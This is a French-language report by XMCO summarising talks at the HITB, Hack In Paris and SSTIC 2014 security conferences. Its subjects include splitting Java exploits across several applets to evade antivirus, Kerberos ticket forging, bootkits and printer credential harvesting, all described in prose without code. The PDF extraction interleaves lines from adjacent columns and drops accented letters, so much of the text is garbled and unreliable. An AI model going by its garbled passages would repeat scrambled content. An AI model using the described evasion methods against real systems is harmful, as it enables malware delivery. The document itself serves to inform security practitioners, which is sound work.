Java_Exploits.pdf
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Le but de la confrence tait donc de prsenter de nou- toutes les applets contenues dans la page.
velles techniques pour chapper aux antivirus, via leurs
mcanismes de dtection par signature. Les prsentateurs
ont donc pris comme exemple la vulnrabilit rfrence
+ getApplet(Stringname) : retourne un objet correspon-
dant une applet spcifique.
CVE-2012-4681 notamment utilise au sein du pack dex-
ploitation BlackHole. En combinant ces deux mthodes, il est donc possible dac-
cder lensemble des mthodes publiques de toutes les
Lide principale pour contourner les antivirus est de scin- applets prsentes sur la page. Il est donc possible dexcu-
der le code dexploitation originel en de multiples sous-pro- ter du code partir dune applet diffrente.
grammes ou plus prcisment, des applets. En effet, lors de
lexcution de plusieurs applets sur une mme page Inter- Pour ordonnancer lexcution de toutes les applets, il suffit
net, ces derniers partagent leur espace mmoire. Chaque de crer une applet spcifique jouant le rle de chef dor-
applet ralisera donc une seule fonctionnalit. chestre. Pour cela, cet appel tablira un canal dchange
entre toutes les applets prsentes sur la page. Chaque ap-
plet chargera lapplet spcifique au canal dchange. Une
fois charge, chaque applet se placera en attente des ins-
tructions la concernant. Pour cela, chaque applet communi-
quera donc au canal de communication la prochaine classe
excuter.
De cette manire, les antivirus sont obligs danalyser len- + setSecurityManager + acc + sun.awt.sunToolKit
+ file:// = malware
semble des applets de manire simultane pour dtecter
lexploit. La complexit de cette mthode est de coordon- La fonctionnalit LiveConnect permet linteraction entre le
ner le flux dexcution de toutes les applets. Voici les six JavaScript et le Java. Il suffit donc dappliquer les techniques
solutions prsentes par les chercheurs : dobfuscation JavaScript pour faire disparatre les informa-
tions identifies comme malveillantes du ByteCode Java.
> Timers Nanmoins, cette technique ncessite que lexcution de
code JavaScript soit autorise sur le navigateur Internet de
Les navigateurs Internet chargent les applications de ma- la victime.
nire totalement alatoire. La mthode la plus simple, pour
sassurer du bon droulement du flux dexcution est duti-
liser des timers . En effet, en dfinissant un temps assez > Serialisation
long entre chaque excution des applets, un attaquant peut
sassurer de lordre dexcution des diffrentes applets. Une autre technique permettant de rduire les informations
Nanmoins cette mthode nest pas optimise et ne peut contenues au sein du ByteCode Java est lutilisation dune
pas tre applique pour des exploits complexes. technique dite de srialisation. Cette mthode, introduite
au sein du JDK 11, vise rendre un objet ou une class stoc-
kable. Lobjet srialis est donc converti en une srie doc-
> Applets Context tets (valeur binaire). Cette transformation peut seffectuer
dans les deux sens et permet ainsi le transfert dun objet
Une autre approche est dutiliser des interfaces Java appe- dune applet une autre par exemple.
les AppletContext . Ces interfaces permettent dobtenir
des informations sur lenvironnement dans lequel lapplet Avec cette mthode, lexploitation de cette vulnrabilit
est excute. Deux mthodes particulirement utiles sont seffectuera en 2 temps :
mises disposition :
+
26 +
La premire tape consiste srialiser lensemble des
getApplets() : renvoie une liste comportant le nom de classes ralisant les actions malveillantes (classes pouvant
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
HITB
potentiellement tre dtectes par lantivirus comme mal- tre contournes, pour peu que lon ait la motivation et
veillantes). les moyens ncessaires. Il est donc prfrable de dsactiver
Java et dinterdire son installation sur un poste utilisateur.
+ Ensuite, il suffit dimporter les sries doctets gnrs
par la srialisation et de les dsrialiser la vole.
Si Java est rellement ncessaire pour lutilisateur, il faut
sassurer que toutes les anciennes versions de Java soient
dsinstalles et que les paramtres de scurit soient confi-
De plus, les donnes srialises peuvent tre offusques. gurs sur haut .
Nanmoins, cette partie na pas t aborde lors de la
confrence. La procdure de gnration du code srialis La confrence sest finie sur 2 anecdotes dmontrant, si cela
et son remplacement au sein du nouvel exploit peuvent tait encore ncessaire, les faiblesses de Java et des anti-
facilement tre automatiss. virus :
> XOrigin
> Conclusion
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Exploiting Passbook to Fly for Free ). Lensemble des marqueurs peut tre ainsi identifi de
Anthony Hariton (Undergraduate Student, University of manire assez triviale. Pour finaliser le billet, il faut faire at-
Crete) tention certains dtails anodins comme lencodage utilis
par la compagnie arienne.
+ Slides
http://haxpo.nl/wp-content/uploads/2014/02/D2T1-Ex-
ploiting-Passbook-to-Fly-for-Free.pdf
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
HITB
G-Jacking AppEngine-based Applications CLOSING KEYNOTE: A Clear and Present Danger, Security
Nicolas Collignon & Samir Megueddem (Synacktiv) vs Net Neutrality: Tales from a Telco
Ms Jaya Baloo (Chief Security Officer, KPN Telecom)
+ Slides
http://haxpo.nl/wp-content/uploads/2014/02/
D2T1-G-Jacking-AppEngine-based-Applications.pdf
+ Slides
http://haxpo.nl/wp-content/uploads/2013/12/D2-CLO-
SING-KEYNOTE.pdf
29
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Voici quelques exemples :
Rfrences
+[1] http://photos.hitb.org/
+[2] http://conference.hitb.org/
30
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Confrences scurit
Hack In Paris
par Romain LEONARD et Etienne BAUDIN
@Hack In Paris
> Jour 1 parons toujours aussi mal larrive des nouvelles tech-
nologies et que plus tt les mesures sont prises, plus elles
KEYNOTE 1 Beyond information ware : Hacking the fu- sont efficaces.
ture of security
Winn Schwartau
+ Slides
https://www.hackinparis.com/sites/hackinparis.com/files/
WinnSchwartau.pdf
Winn Schwartau a ensuite prsent les technologies aux- Cet expert en scurit ralise rgulirement des audits de
quelles, selon lui, il est ncessaire de sintresser. Il a no- scurit sur les systmes SCADA et leur environnement. Il a
tamment voqu linternet des objets, les drones et autres ainsi mis en vidence des situations relles ou des attaques
micro-drones, les exosquelettes et les prothses ou encore basiques permettant de compromettre trs facilement des
le Bring Your Own Disaster. systmes SCADA critiques.
La conclusion de cette prsentation est que nous nous pr- Selon lui, les attaques exploitant des infrastructures cri-
31
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
tiques et se basant sur des vecteurs dattaques basiques ne Breaking Through The Bottleneck - Mobile Malware Is
peuvent faire partie des attaques de types APT. Il les classe Outbreak Spreading Like Wildfire
dans les BPT pour Basic Persistent Threats. Thomas Wang (Baidu)
+ Slides
https://www.hackinparis.com/sites/hackinparis.com/files/
JosepPiandPedro.pdf
+
Pentesting NoSQL DBs with NoSQL Exploitation
les femtocells (FakeCMCC.A) ; Framework
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Biting Into The Forbidden Fruit. Lessons From Trusting Setup for Failure : Defeating UEFI/Win8 SecureBoot
Javascript Crypto John Butterworth (speaker) and his team (Corey Kallenberg,
Krzysztof Kotowicz (Google) Sam Cornwell and Xeno Kovah)
+ Slides
http://fr.slideshare.net/kkotowicz/biting-into-the-forbid-
+ Slides
https://www.hackinparis.com/sites/hackinparis.com/files/
den-fruit-lessons-from-trusting-javascript-crypto# JohnButterworth.pdf
Cet expert en scurit travaillant chez Google a prsent le John Butterworth a commenc sa prsentation par une ex-
fruit de ses recherches sur le niveau de scurit rellement plication de la Malware food chain avant la mise en
apport par les outils de cryptographie implments en Ja- place des nouvelles scurits. En effet, lpoque du BIOS,
vaScript. les malwares taient capables, aprs avoir compromis le
systme, de compromettre le MBR et le BIOS pour sassurer
Il a dmontr que la cryptographie au sein de JavaScript de leur persistance..
avait beaucoup progresse. Nanmoins, de nombreuses
vulnrabilits, lies au langage et aux plateformes web,
sont toujours prsentes et difficiles corriger.
34
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Hack In Paris 2014
+
Jayson E. Street (Krypton Security)
Slides
Cet expert en scurit, qui dispose dun charisme impres- https://www.hackinparis.com/sites/hackinparis.com/files/
sionnant, a prsent le rsultat de 80 confrences quil a pu MarioHeiderich.pdf
suivre travers le monde.
Mario Heiderich a commenc par prsenter les avantages
Il est ainsi revenu sur lactualit des services secrets dans avancs par les frameworks MVC pour JavaScript :
le monde. Ainsi, il ny aurait pas que les Chinois qui es-
pionneraient. La NSA serait trs prsente galement. Mais Ces frameworks semblent donc faire tout ce dont un dve-
pas seulement, les Canadiens, les Franais, les Anglais, ou loppeur a besoin. Ils permettent de travailler vite, simple-
encore les Allemands ont galement des agences gouver- ment, et de faire plus que ce qui est normalement possible.
nementales ddies ce type de missions despionnage. Qui plus est, ils utilisent une moustache sexy pour leur no-
Il est galement revenu sur le ct culturel de la scurit in- tation {{ Stuff }} (voir mustache.github.io).
formatique. Ainsi un pirate est souvent reprsent comme
un personnage cagoul, se dplaant tel un ninja. Le terme Mais qui dit faire plus, dit aussi avoir une plus grande sur-
hacking est aussi souvent li des activits criminelles dans face dattaque. Cest ce que Mario a dmontr dans la suite
nos socits, alors quil se rapporte souvent des activits de sa prsentation.
thiques et honntes.
35
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Extreme Forensics Reloaded 2Q /2014 Leur outil se base sur un constat rgulirement fait par les
Alvaro Alexander Soto (ASOTO Technology Group) pentesters dans le cadre de tests dintrusion en entreprise:
les imprimantes multifonctions ne sont pas scurises. En
+ Slides
https://www.hackinparis.com/sites/hackinparis.com/files/
effet, il est souvent possible dobtenir un accs un compte
dActive Directory via ces imprimantes. Dans 5% des cas, il
ASOTO.pdf est galement possible dobtenir directement des identi-
fiants dadministrateur du domaine. Dailleurs, pour rendre
Alvaro Alexander Soto a ensuite prsent une confrence leur prsentation plus attractive et appuyer lutilit de leur
traitant du Forensics appliqu. Lobjectif ntait pas de pr- outil, ils ont prsent plusieurs cas pratiques de dtourne-
senter des dtails techniques, mais des anecdotes et des ment de ces imprimantes multifonctions.
cas pratiques rencontrs par sa socit.
Plus srieusement, il a montr des techniques pour accder Loutil sappelle Praeda. Il permet de scanner les rseaux
en ATA des disques durs externes USB en soudant un port la recherche dimprimantes. Il lance ensuite des modules
SATA sur le disque, ou encore des disques durs placs ct spcifiques en fonction du modle et rcupre des donnes
dlectro-aimants afin de les rendre inutilisables si le botier (usernames, passwords, etc.). On utilisera par la suite les in-
de la machine est ouvert. formations rcoltes pour simplanter dans le systme din-
formation. Cet outil devrait bientt sintgrer Metasploit.
Cest pourquoi il nous a rappel la ncessit de former des
experts en forensics comptents dans diffrents domaines
pour faire face des criminels toujours plus ingnieux. Les
domaines en question sont par exemple les systmes dex-
ploitation, les terminaux mobiles... Lobjectif est selon lui
de former des gens capables de voire plus loin que les tech-
niques danalyse classiques.
+Slides
https://www.hackinparis.com/sites/hackinparis.com/files/
DeralHeilandandPeterArzamendi.pdf
Ils proposent plusieurs recommandations pour viter les si-
Ces deux experts travaillant pour Rapid7, lditeur du c- tuations risques :
lbre framework dexploitation Metasploit, ont prsent un
nouvel outil quils ont dvelopp. +Modifier des mots de passe administrateurs ;
36
+Raliser du patch management sur les firmwares de ces
quipements ;
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Hack In Paris 2014
+ Slides
https://www.hackinparis.com/sites/hackinparis.com/files/
CyrillBrunschwiler.pdf
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Splinter The Rat Attack - Create Your Own Botnet To Ex- Le faible niveau technique de la confrence est amplement
ploit The Network compens par lnergie du speaker et lintrt de son projet
Solomon Sonya pour la recherche.
Solomon Sonya a prsent son Botnet usage ducatif. Le projet est disponible ladresse suivante : https://github.
Ce professeur, langlais impeccable et au talent dora- com/splinterbotnet
teur indniable, a dmarr ce projet afin de permettre aux
chercheurs dtudier le comportement dun Botnet sur un
rseau. DEBAT - Global Surveillance - Security VS Privacy
38
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Confrences scurit
SSTIC
par Julien MEYER,
Charles DAGOUAT, Stphane AVI et Antonin AUROY
Comme chaque anne, le SSTIC sest droul les 4, 5 et 6 Chemins de contrle en environnement Active Directory
juin Rennes, sur le campus universitaire de Beaulieu Sud. Emmanuel Gras et Lucas Bouillot (ANSSI)
XMCO a eu la chance dtre parmi les quelques 500 partici-
pants ayant russi acheter leur place durant les quelques
minutes o celles-ci taient disponibles. En effet, depuis
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/che-
maintenant plusieurs annes, lensemble des places dispo- mins_de_controle_active_directory/SSTIC2014-Slides-che-
nibles est coul en un temps record : gnralement moins mins_de_controle_active_directory-gras_bouillot.pdf
de 10 minutes. Cette anne na pas fait exception la rgle.
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/che-
> Jour 1 mins_de_controle_active_directory/SSTIC2014-Article-che-
mins_de_controle_active_directory-gras_bouillot.pdf
Confrence douverture
Travis Goodspeed
Aprs avoir prsent quelques rappels sur Active Directory,
Lucas Bouillot et Emmanuel Gras sont entrs dans le vif de
Ldition 2014 du SSTIC a t ouverte par Travis, qui a pr-
leur sujet : lanalyse des relations privilgies dfinies au
sent plusieurs preuves de concept issues du journal quil
sein dun AD. En effet, bien que les auditeurs se contentent
auto-publie avec plusieurs autres chercheurs : PoC||GTFO.
souvent dplucher la liste des comptes utilisateurs appar-
tenant au groupe Administrateurs de Domaine , il existe
Sortant tout juste du train, nous navons pas rellement
de nombreuses relations exotiques permettant un
pu assister cette prsentation ; la salle tant comble, es-
utilisateur lambda dobtenir un niveau de privilges qui-
calier compris, lorsque nous sommes arrivs. Malgr tout,
valent. Par exemple, quand un stagiaire est en mesure de
la conclusion semblait pertinente. Le chercheur a en effet
modifier les GPO excutes sur le poste des administrateurs
pouss les participants au SSTIC schanger des trucs et
de domaine, ce dernier se trouve alors en mesure dobtenir
astuces, comportements qui ne seraient selon lui pas assez
les privilges dadministration du domaine par rebond.
dvelopps au sein de la communaut, et qui pourtant se-
rait la meilleure des garanties en matire de transmission
Lucas et Emmanuel ont donc dvelopp une solution leur
des connaissances.
permettant de simplifier lanalyse des relations dfinies
dans les AD (ceux que lon peut trouver dans la vraie vie).
Les trois confrences qui ont suivi traitaient du contrle
Cette solution repose sur lanalyse du fichier NTDS.dit afin
daccs et de la gestion des privilges en environnement
de reprsenter les relations dfinies dans lAD en un graphe
Windows et plus particulirement de lanalyse des relations
orient. Cette technique permet didentifier en un clin doeil
privilgies en environnement Active Directory, ainsi que
les chemins permettant dobtenir les privilges dadminis-
du fonctionnement de limplmentation Microsoft de Ker-
tration du domaine.
beros.
39
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Cette prsentation, bien que trs thorique, a permis de Secrets dauthentification pisode II : Kerberos
mettre en avant un problme souvent ignor par les au- contre-attaque
diteurs. Aurlien Bordes
Joffrey Czarny et Philippe Biondi ont ensuite prsent BTA, Aprs avoir dtaill le fonctionnement et les spcificits de
une implmentation Open-Source des concepts prsents Kerberos en environnement Active Directory (en particulier
par Lucas et Emmanuel. Bien que leur solution soit architec- les notions de ticket TGT et TGS, ainsi que la PAC), Aurlien a
ture diffremment, lobjectif recherch par BTA reste simi- prsent les problmatiques lies la compromission dun
laire : raliser un audit dun environnement Active Directory domaine AD.
afin didentifier les comptes disposant de privilges levs,
les comptes inutiliss, les utilisateurs qui ne se sont jamais En effet, lorsquun pirate est en mesure de rcuprer les
connects, ceux qui nont pas chang leur mot de passe empreintes NTLM associes certains comptes (typique-
ou encore les comptes disposant dun mot de passe faible. ment les comptes machines suffixs par un $ , le compte
krbtgt , ou encore les comptes de trust associs un
Loutil est dvelopp en Python et sappuie sur une base domaine AD) de lAD laide doutils tels que pwdump ,
MongoDB. Il permet dans un premier temps dimporter le il est en mesure de contourner le mcanisme de contrle
contenu dune base NTDS.DIT afin de lancer dans un second daccs offert par Kerberos.
temps un ensemble de minner permettant de raliser
des vrifications sur des points de configuration prcis, Concrtement, un pirate est en mesure de forger un ticket
et ainsi de raliser un audit complet dans un temps mai- (TGS) Kerberos valide lui permettant de se connecter sur un
tris. systme distant intgr au domaine et dobtenir les privi-
lges dadministration les plus levs sur ce dernier.
Lintrt principal de cet outil est la possibilit dtendre la
liste des vrifications ralises en dveloppant des min-
ner , et ainsi de capitaliser dans le temps sur les nouveaux
+ La compromission des secrets dun compte machine de
lAD permet davoir le contrle sur la machine associe.
problmes de configuration dcouverts.
+La compromission des secrets dauthentification du
compte krbtgt permet davoir le contrle sur toutes les
ressources du domaine.
Analyse scurit des modems des terminaux mobiles How to play Hooker : Une solution danalyse automati-
Benoit Michau (ANSSI) se de markets Android
Dimitri Kirchner et Georges Bossert (AMOSSYS)
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/Ana-
lyse_securite_modems_mobiles/SSTIC2014-Slides-Ana-
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/how_
lyse_securite_modems_mobiles-michau.pdf to_play_hooker__une_solution_danalyse_automati/SS-
TIC2014-Slides-how_to_play_hooker__une_solution_dana-
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/Ana-
lyse_automatise_de_markets_android-kirchner_bossert.
pdf
lyse_securite_modems_mobiles/SSTIC2014-Article-Ana-
lyse_securite_modems_mobiles-michau.pdf + Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
En dbut daprs-midi, Benoit Michau est venu prsenter la how_to_play_hooker__une_solution_danalyse_automati/
dmarche quil a mise en oeuvre pour analyser la scurit SSTIC2014-Article-how_to_play_hooker__une_solution_
des modems 2G, 3G et LTE des terminaux mobiles. Celle-ci danalyse_automatise_de_markets_android-kirchner_bos-
a dbut par une tude des quipements et des protocoles sert.pdf
mis en oeuvre dans ce type de communications afin dtre
en mesure de construire une plateforme de test. Une fois La prsentation suivante a permis daborder un sujet moins
la plateforme assemble, le chercheur a prsent le type bas-niveau. En effet, Dimitri Kirchner a dtaill la concep-
de tests raliss sur les quipements (tests sur les syntaxes tion dun framework danalyse dapplications Android.
ainsi que sur les protocoles), ainsi que certaines failles d-
couvertes par ce biais : Lobjectif des auteurs est de monter une plateforme dana-
lyse automatique leur permettant de caractriser les ap-
+Indication de chiffrement du canal radio inexistante; plications proposes sur un Android Market, afin dtre
en mesure de raliser des tudes statistiques sur ces der-
+Corruption mmoire lors de lauthentification 3G ; nires, mais aussi dobserver les rsultats dtaills relatifs
une application donne. Ils se reposent pour cela sur les
+Connexion LTE sans contrle dintgrit - attachement
dun mobile un faux rseau LTE.
frameworks Androguard pour lanalyse statique et sur Subs-
trate pour lanalyse dynamique.
Les failles existent donc bien chez de nombreux fabricants Une surcouche base dElasticSearch et de Kibana a aussi
et diteurs. Nombreux les corrigent ; mais pas tous. t conue. Elle permet dinterroger la base dans laquelle
sont stocks tous les rsultats. Celle-ci permet par exemple
de visualiser simplement les permissions rellement utili-
Investigation numrique & terminaux Apple iOS - Ac- ses par les applications, les suites de chiffrements prf-
quisition de donnes stockes sur un systme ferm res des dveloppeurs ou de dtecter certaines anoma-
Mathieu Renard (ANSSI) lies comme les applications qui cherchent utiliser les
commandes iptables ou su , ou encore qui cherchent
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
accder des fichiers prsents ailleurs que dans leur /
data/ .
Mathieu_RENARD_-_Investigation_numerique_iOS/SS-
TIC2014-Article-Mathieu_RENARD_-_Investigation_nume-
rique_iOS-renard.pdf
41
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Catch Me If You Can - A Compilation Of Recent Anti-Ana- Prsentation courte : Analyse de scurit des box ADSL
lysis In Malware Eric Alata (CNRS, LAAS, INSA & Thales), Jean-Christophe
Marion Marschalek (CYPHORT) Courrege (CNRS, LAAS & INSA), Mohammed Kaaniche
(CNRS, LAAS & INSA), Vincent Nicomette (CNRS & LAAS),
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
Yann Bachy (CNRS & LAAS), Yves Deswarte (CNRS & Thales)
catch_me_if_you_can/SSTIC2014-Article-catch_me_if_
you_can-marschalek.pdf
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/ana-
lyse_de_securite_des_box_adsl/SSTIC2014-Article-ana-
Les techniques danti-debug sont monnaie courante pour lyse_de_securite_des_box_adsl-alata_courrege_kaaniche_
se protger des analystes ou ralentir les analyses. Cepen- nicomette_bachy_deswarte.pdf
dant, cela ne rend pas ces dernires impossibles, il suffit
de persvrer. Ainsi loratrice nous fait dcouvrir / redcou- Les chercheurs se sont penchs sur la scurit des box ADSL
vrir plusieurs techniques danti-debug et revient sur le cas en partant du constat que sur celles-ci, la surface dattaque
dun malware intressant car il utilisait un langage obsolte se composait de deux axes : le LAN et le WAN. Cependant,
(VB6). que se passe-t-il si lon se branche la place de notre FAI
avec notre propre DSLAM ?
Ils ont tudi cette attaque sur six box diffrentes afin
de dterminer comment les diffrents FAI dploient leurs
mises jour, lancent des services, administrent les box, etc.
+ Slide
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/la_ra-
Prsentation courte: Scurit des ordivisions
Frdric Basse (Thales)
dio_qui_venait_du_froid/SSTIC2014-Slides-la_radio_qui_
venait_du_froid-schneider.pdf
+ Slides
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/la_ra-
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/secu-
rite_des_ordivisions/SSTIC2014-Slides-securite_des_ordivi-
sions-basse.pdf
dio_qui_venait_du_froid/SSTIC2014-Article-la_radio_qui_
venait_du_froid-schneider.pdf
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/secu-
Une blague un collgue ? Voil comment Alain Schnei- rite_des_ordivisions/SSTIC2014-Article-securite_des_ordi-
der a dbut son tude sur les puces NRF24L01... En effet, visions-basse.pdf
un jour, son collgue est venu au bureau avec un clavier
sans fil, du coup, celui-ci sest demand sil pouvait inter- Votre tl est-elle scurise ? Voici la question laquelle
cepter les touches tapes. Ainsi, lauteur nous a fait une Frdric Basse essayer de rpondre en analysant la scu-
comparaison technique et tarifaire du matriel dintercep- rit dune smartTv (ordivision) de la marque Philips. Cette
tion existant. Il a fini sa prsentation sur une dmonstration boite noire renferme un vrai systme Linux avec de vrais
dinterception dun clavier Microsoft qui chiffre les donnes paquets et des vraies vulnrabilits. Au cours de son ana-
avec XOR... lyse, il est revenu vers une faille dcouverte au sein de la
librairie libupnp en 2012.
42
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
SSTIC 2014
> Jour 2
Escalade de privilges dans une carte puce Java Card
Guillaume Bouffard (quipe Smart Secure Devices (SSD)),
Jean-Louis Lanet (Universit de Limoges)
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/es-
calade_de_privilege_dans_une_carte_a_puce_java_c/SS-
TIC2014-Slides-escalade_de_privilege_dans_une_carte_a_
puce_java_card-bouffard_lanet.pdf
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/es-
calade_de_privilege_dans_une_carte_a_puce_java_c/
SSTIC2014-Article-escalade_de_privilege_dans_une_
carte_a_puce_java_card-bouffard_lanet.pdf
Bootkit revisited
Les chercheurs de Limoges ont voulu mieux comprendre ce Samuel Chevet (Sogeti)
+
qui se passe dans ces petites botes noires. Aprs un rappel
sur le JavaCard, les cartes puces et les JVM, ces derniers Slides
ont rfrenc les attaques existantes sur ce type de techno- https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
logies. Puis ils ont expliqu comment excuter un Shellcode bootkit_revisited/SSTIC2014-Slides-bootkit_revisited-che-
sur les cartes et dmontr une nouvelle technique pour vet.pdf
+
excuter du code natif pour accder aux informations stoc-
kes dans les cartes puces. Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
bootkit_revisited/SSTIC2014-Article-bootkit_revisited-che-
Recherche de vulnrabilits dans les piles USB : ap- vet.pdf
proches et outils
Fernand Lone Sang (QuarksLAB), Jordan Bouyat (QuarksLAB) Quelques semaines aprs avoir t prsents la HITB
Amsterdam, Samuel Chevet, chercheur chez Sogeti ESEC,
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/re-
nous a parl de ses travaux sur les rootkits, et plus parti-
culirement les bootkits, qui infectent les ordinateurs lors
cherche_de_vulnrabilits_dans_les_piles_usb__appr/SS- du processus de dmarrage. Il sest plus particulirement
TIC2014-Slides-recherche_de_vulnrabilits_dans_les_piles_ intress aux systmes dexploitation Windows pour ar-
usb__approches_et_outils-lone-sang_bouyat.pdf chitecture 64 bits. En effet, ces derniers disposent dune
fonctionnalit leur permettant dempcher le chargement
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/re-
de drivers systme ne disposant pas dune signature cryp-
tographique valide.
cherche_de_vulnrabilits_dans_les_piles_usb__appr/SS-
TIC2014-Article-recherche_de_vulnrabilits_dans_les_piles_ Sa prsentation sest dcoupe en deux parties. La pre-
usb__approches_et_outils-lone-sang_bouyat_2.pdf mire a permis daborder chaque tape du dmarrage
dun ordinateur : depuis le chargement du BIOS jusquau
lancement du systme dexploitation. Il a notamment rap-
Du fuzzing sur USB, en veux-tu en voil... Aprs une ex- pel tous les mcanismes de protection mis en place pour
plication sur lUSB, les techniques existantes de fuzzing et empcher une altration du systme dexploitation. En ef-
les fuzzeurs existants, mais pas toujours adquats ; le cher- fet, en sattaquant un systme au cours de ces tapes de
cheur prsente son outil quil a dvelopp afin de masteri- dmarrage, un attaquant est en mesure de disposer des
ser le fuzzing des quipements qui acceptent de lUSB. Ce- privilges les plus levs, afin par exemple de modifier le
lui-ci, bas sur un Facedancer conu par Travis Goodspeed, comportement du systme dexploitation.
permet de jouer/rejouer des trames USB modifies avec un
systme de surveillance qui essaie de dtecter toute ano- La deuxime partie sest concentre sur le contournement
malie. de toutes ces protections de manire stable. Pour le cher-
43
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
cheur, cela signifie de ne pas utiliser de hook, doffset En effet, la surveillance de structures connues au sein de la
hardcod ou de recherche de pattern en mmoire au sein mmoire de lhyperviseur permettrait de reprer une ven-
du bootkit/rootkit ; et ce, afin dtre compatible avec len- tuelle compromission lors de modifications inhabituelles de
semble des versions de Windows. Il a prsent son propre ces structures.
bootkit baptis ReBoot. Celui-ci repose sur lutilisation de
diffrentes fonctionnalits offertes par les processeurs 64
bits telles que le mode V8086 ou encore lutilisation de La scurit des systmes mainframes
breakpoint matriel. Stphane Diacquenod (Volvo IT)
Tests dintgrit dhyperviseurs de machines virtuelles Stphane Diacquenod de chez Volvo IT dresse un tat des
distance et assists par le matriel lieux de la scurit des mainframes. Utilis dans de nom-
Benoit Morgan et ric Alata (LAAS-CNRS) breux secteurs (bancaire, assurance, industrie lourde et dis-
tribution), le systme mainframe repose sur un hyperviseur
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/tests_
de type 1 nomm PR/SM (pour Processor Resource / Sys-
tem Manager). Ce dernier assure un mcanisme de parti-
dintegrite_dhyperviseurs/SSTIC2014-Article-tests_dinte- tions logiques LPAR permettant de sparer diffrents en-
grite_dhyperviseurs-morgan_alata_nicomette.pdf vironnements, avec une tanchit certifie EAL5. Chaque
LPAR dispose de son propre systme dexploitation, parmi
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/tests_
z/OS, z/VSE, z/TPF, s/Linux et z/VM.
Prsentation courte : Reconnaissance rseau grande Dans le monde de la cryptographie applique, on rencontre
chelle : port scan is not dead deux populations : dune part les cryptologues, maitres
Fred Raynal et Adrien Guinet (Quarkslab) des mathmatiques et des algorithmes de chiffrement, et
dautre part, les dveloppeurs, artistes du code et savants
+ Slides
http://www.quarkslab.com/dl/14-sstic-ivy-talk.pdf
de lingnierie logicielle.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Buy it, use it, break it... fix it : Caml Crush, un proxy Martine monte un CERT
PKCS#11 filtrant Nicolas Bareil (Airbus Group)
Ryad Benadjila, Thomas Calderon et Marion Daubignard
(ANSSI) Dans les annes 80, Martine allait la ferme, la mer,
au zoo, au cirque, et apprenait faire la cuisine. En 2014,
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
Martine se met la page : elle monte un CERT. Cest sur ce
thme plein dhumour, dans un discours saupoudr dune
buy_it_use_it_break_it__fix_it__caml_crush_un_prox/ pointe de provocation, que Nicolas Bareil voque son re-
SSTIC2014-Slides-buy_it_use_it_break_it__fix_it__caml_ tour dexprience sur la cration dun CERT industriel au sein
crush_un_proxy_pkcs11_filtrant-benadjila_calderon_dau- dAirbus Group.
bignard.pdf
Dabord, cest quoi un CERT ? Computer Emergency Res-
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
ponse Team , nous rpond Martine. Bon, on nest pas plus
avancs, mais on sait que a parle de rponse incident.
buy_it_use_it_break_it__fix_it__caml_crush_un_prox/ Dailleurs, Martine a bien tent de demander ses cama-
SSTIC2014-Article-buy_it_use_it_break_it__fix_it__caml_ rades, mais les CERT cest un milieu ferm et le contact nest
crush_un_proxy_pkcs11_filtrant-benadjila_calderon_dau- visiblement pas ais tablir. Mais Martine elle ne sest pas
bignard.pdf dmonte, elle a retrouss ses manches et elle sest attele
la tche, toute seule, parce que cest sr que ce nest pas
Le standard PKCS#11, produit par RSA Labs, permet din- son chien Patapouf qui allait laider.
terfacer de faon standardise des terminaux implmen-
tant de la cryptographie (un lecteur de carte puce par Quand on parle de CERT, on parle donc dincidents. Et des
exemple) et les applications qui utilisent ces terminaux. Le incidents sur un SI comme celui dAirbus Groupe, il y en a.
standard prend la forme dune API : les applications font Beaucoup. Du coup, pour Martine, pas question de soccuper
appel aux fonctions de cette API et les vendeurs fournissent des faits divers, des chiens crass (mon pauvre Patapouf),
des bibliothques partages qui les implmentent. Le pro- un CERT a se concentre sur les gros incidents. Encore que,
blme, cest que cette API est vulnrable certains types les incidents il faut les dtecter, et en gnral ce nest pas le
dattaques, notamment les attaques Wrap and Decrypt SOC/NOC qui les dtecte, lalerte vient de lextrieur. Aprs,
qui permettent dextraire les cls secrtes prsentes au sein on observe : cest qui lattaquant ? Quest-ce quil cherche ?
